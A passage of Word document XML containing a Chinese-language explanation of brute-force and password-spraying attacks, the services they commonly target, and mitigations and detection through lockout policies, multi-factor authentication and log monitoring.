        </w:rPr>
        <w:t>，或者可以使用预先计算</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好的</w:t>
      </w:r>
      <w:r w:rsidR="007029CC" w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>彩虹表来破解哈希。</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:t>通常在</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:t>网络以外</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他们自己</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:t>所控制的系统上来</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破解哈希</w:t>
      </w:r>
      <w:r w:rsidR="007029CC" w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CC5F2" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r w:rsidRPr="00F10A16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会在对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10A16">
        <w:t>密码和哈希一无所知的情况下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10A16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>胡乱尝试密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10A16">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10A16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强行登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10A16">
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>使用一系列已知或可能的密码来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试暴力破解</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种操作</w:t>
      </w:r>
      <w:r>
        <w:t>的风险比较大，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为它可能会导致大量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和账号</w:t>
      </w:r>
      <w:r>
        <w:t>锁定</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，具体取决于组织的登录失败策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13629A60" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>既然使用</w:t>
      </w:r>
      <w:r>
        <w:t>多个密码来暴力破解一个账号会导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r>
        <w:t>账号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:t>锁定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:t>会使用密码喷洒技术来规避</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>风险。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码喷洒</w:t>
      </w:r>
      <w:r>
        <w:t>技术使用一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（例如“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password01</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”）或一小列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>满足域的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复杂性策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且可能是常用的密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和网络上</w:t>
      </w:r>
      <w:r>
        <w:t>许多其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同</w:t>
      </w:r>
      <w:r>
        <w:t>账号来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C916F6" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00E32104" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>喷洒</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口上的管理服务。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:t>喷洒常常针对如下服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582BD26" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:lastRenderedPageBreak/>
        <w:t>SSH (22/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F3637" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>Telnet (23/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEFCCE5" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>FTP (21/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23946321" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>NetBIOS/SMB /Samba (139/TCP &amp; 445/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EABBF3C" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>LDAP (389/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD416E5" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>Kerberos (88/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F2E92" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>RDP/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端服务</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t xml:space="preserve"> (3389/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362AA015" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>HTTP/HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理服务</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5E77">
        <w:t xml:space="preserve"> (80/TCP &amp; 443/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C2803" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>MSSQL (1433/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A7C186" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>Oracle (1521/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB801A1" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>MySQL (3306/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423500F" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>VNC (5900/TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C32FBC" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00E32104" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认环境中，</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接尝试不太可能通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发事件，这会创建</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4625 </w:t>
      </w:r>
      <w:r w:rsidRPr="009807F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“登录失败”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B0270" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00B331A9" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2543"/>
        <w:gridCol w:w="7193"/>
      </w:tblGrid>
      <w:tr w:rsidR="007029CC" w:rsidRPr="002D5E77" w14:paraId="468E23D8" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="11692C93" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5E77">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0ADFCB7D" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="002D5E77" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5E77">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007029CC" w14:paraId="06F47DDE" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56020077" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00AC6B7E" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidR="007029CC" w:rsidRPr="00AC6B7E">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>账号使用策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D8BDC2" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00AC6B7E" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:t>失败登录尝试</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>达到</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:t>一定数量后锁定</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>账号的</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:t>策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来防止密码</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:t>被</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:t>猜中。</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过于严格的策略可能会导致拒绝服务的情况并导致环境无法使用，而且</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:t>暴力破解针对的所有账号都会被锁定。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007029CC" w14:paraId="63105EB7" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C8D5E93" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00AC6B7E" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidR="007029CC" w:rsidRPr="00AC6B7E">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>多因子认证</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06721EB3" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00AC6B7E" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用多因子身份认证。可能的</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:t>情况下</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，还应在面向外部的服务上启用多因子身份认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007029CC" w14:paraId="35BD7CD0" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="060E7A56" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00AC6B7E" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidR="007029CC" w:rsidRPr="00AC6B7E">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7477DF46" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00AC6B7E" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>创建密码策略时，请参考</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NIST</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6B7E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>准则。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4169FF1F" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6D0DA6" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="00B331A9" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1546C" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>通常在目标网络范围之外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破解</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希，因此很难检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到哈希</w:t>
      </w:r>
      <w:r>
        <w:t>破解行为</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02009924" w14:textId="70411FC2" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控认证</w:t>
      </w:r>
      <w:r>
        <w:t>日志来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:t>是否有有效账号登录系统和应用失败的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果认证</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败率很高，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很可能</w:t>
      </w:r>
      <w:r>
        <w:t>有攻击者试图使用合法</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施</w:t>
      </w:r>
      <w:r>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而获取</w:t>
      </w:r>
      <w:r>
        <w:t>系统访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFFAEC0" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要查看</w:t>
      </w:r>
      <w:r>
